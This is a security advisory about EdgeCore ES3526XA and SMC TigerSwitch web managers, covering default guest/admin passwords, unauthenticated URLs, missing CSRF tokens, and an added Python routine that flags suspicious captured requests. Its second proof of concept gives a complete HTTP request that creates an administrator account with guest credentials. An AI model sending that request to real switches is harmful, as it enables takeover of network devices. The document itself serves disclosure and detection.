
EdgeCore ES3526XA Manager CSRF / Access Bypass / Weak Credentials
Posted Jun 23, 2016
Authored by Karn Ganeshen

EdgeCore ES3526XA Manager suffers from weak credential, access bypass, and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, bypass, csrf
SHA-256 | 4c554624c94b5f4cf21ee4495b9c4e0f66a5180eb79df24623c95cf9103237bc

*EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager -
Multiple Vulnerabilities*
Also rebranded as: *SMC TigerSwitch 10/100 SMC6128L2 Manager*

Object ID:
1.3.6.1.4.1.259.8.1.5

Switch Information
________________________________________
Main Board:
Number of Ports 26
Hardware Version R01
Management Software:
Loader Version 1.0.0.2
Boot-ROM Version 1.0.0.5
Operation Code Version 1.28.16.14

Object ID:
1.3.6.1.4.1.202.20.66

Switch Information
________________________________________
Main Board:
Number of Ports 28
Hardware Version R01
Chip Device ID Marvell 98DX106-B0, 88E6095[F]
Internal Power Status Active

Management Software:
EPLD Version 0.07
Loader Version 1.0.2.0
Boot-ROM Version 1.2.0.1
Operation Code Version 1.4.18.2
Role Master

Other firmware / software versions may also be affected.

*Vendor Response*: These models are no longer supported.

*Vulnerability Details*

*1. Weak Credentials Management*

Guest / guest – priv 0 - read privileges to most device configuration
Admin/admin – priv 15 - read/write access

*Issue:*
The application does not enforce a mandatory password change.

*2. Access Control Flaws*

Any function can be performed by directly calling its URL
(GET/POST) without any authentication. This includes creating new
privileged user(s), changing (admin) passwords, deleting user(s),
reading/changing the device configuration, rebooting the device, etc.

+ Guest can also perform any administrative function, such as
adding, updating, and deleting users.

*PoC 1:*
For example, anyone can access these URLs directly, without any
authentication:

http://IP/config/153/sysinfo.htm?unit=1
http://IP/config/153/port_config.htm?unit=
http://IP/home/153/active_panel_bid0.htm?unit=1
http://IP/config/upnp_config.htm
http://IP/config/153/user_accounts.htm

*PoC 2:*
Create a new privileged account:

POST /config/153/user_accounts.htm HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://IP/config/153/user_accounts.htm
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166

page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=&passwd_new=&passwd_confirm=

*Issue:*
Application does not enforce access control correctly.

*3. Vulnerable to Cross-Site Request Forgery*

No CSRF token is generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device, such as password changes,
configuration parameter changes, saving a modified configuration, and device
reboot.
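
Added example (not part of the original advisory or any vendor code): a Python triage routine for captured HTTP requests to the account page, flagging the conditions described in sections 2 and 3. The address 192.0.2.10, the sample captures, the function names and the assumption that "admin" is the only administrative login are constructed for illustration.

```python
import base64
from urllib.parse import parse_qs, urlsplit

def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, form fields)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _ = lines[0].split(" ", 2)
    headers = {n.strip().lower(): v.strip() for n, _, v in (l.partition(":") for l in lines[1:])}
    form = {k: v[0] for k, v in parse_qs(body.strip(), keep_blank_values=True).items()}
    return method, urlsplit(target).path, headers, form

def basic_user(headers):
    """Return the Basic-auth user name, or None when absent or malformed."""
    scheme, _, token = headers.get("authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        return base64.b64decode(token, validate=True).decode("utf-8").split(":", 1)[0]
    except (ValueError, UnicodeDecodeError):
        return None

def findings(raw, admins=("admin",)):
    """Flag account-page POSTs matching the advisory (admins is an assumption)."""
    method, path, headers, form = parse_request(raw)
    if method != "POST" or not path.endswith("/user_accounts.htm"):
        return []
    out, user = [], basic_user(headers)
    if user is None:
        out.append("unauthenticated-account-change")
    elif user.lower() not in admins:
        out.append("non-admin-account-change")
    # Level 15 is the read/write privilege level listed in the advisory.
    if form.get("actionType") == "Add" and form.get("sel_access_level") == "15":
        out.append("privileged-account-created")
    # No CSRF token exists, so an Origin/Referer mismatch is the only request-level hint.
    source = headers.get("origin") or headers.get("referer") or ""
    if urlsplit(source).netloc.lower() != headers.get("host", "").lower():
        out.append("cross-origin-or-missing-referer")
    return out

def sample(auth, referer):
    """Constructed capture shaped like the request in PoC 2 (documentation address)."""
    return ("POST /config/153/user_accounts.htm HTTP/1.1\r\nHost: 192.0.2.10\r\n"
            f"Referer: {referer}\r\nAuthorization: Basic {auth}\r\n\r\n"
            "page=userAccount&actionType=Add&txt_user_name=guest1&sel_access_level=15")

if __name__ == "__main__":
    print(findings(sample("Z3Vlc3Q6Z3Vlc3Q=", "http://192.0.2.10/config/153/user_accounts.htm")))
    print(findings(sample("YWRtaW46YWRtaW4=", "http://example.invalid/")))
```

Because the vendor no longer supports these models, this kind of check belongs on a proxy or capture point in front of the management interface rather than on the switch itself.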

+++++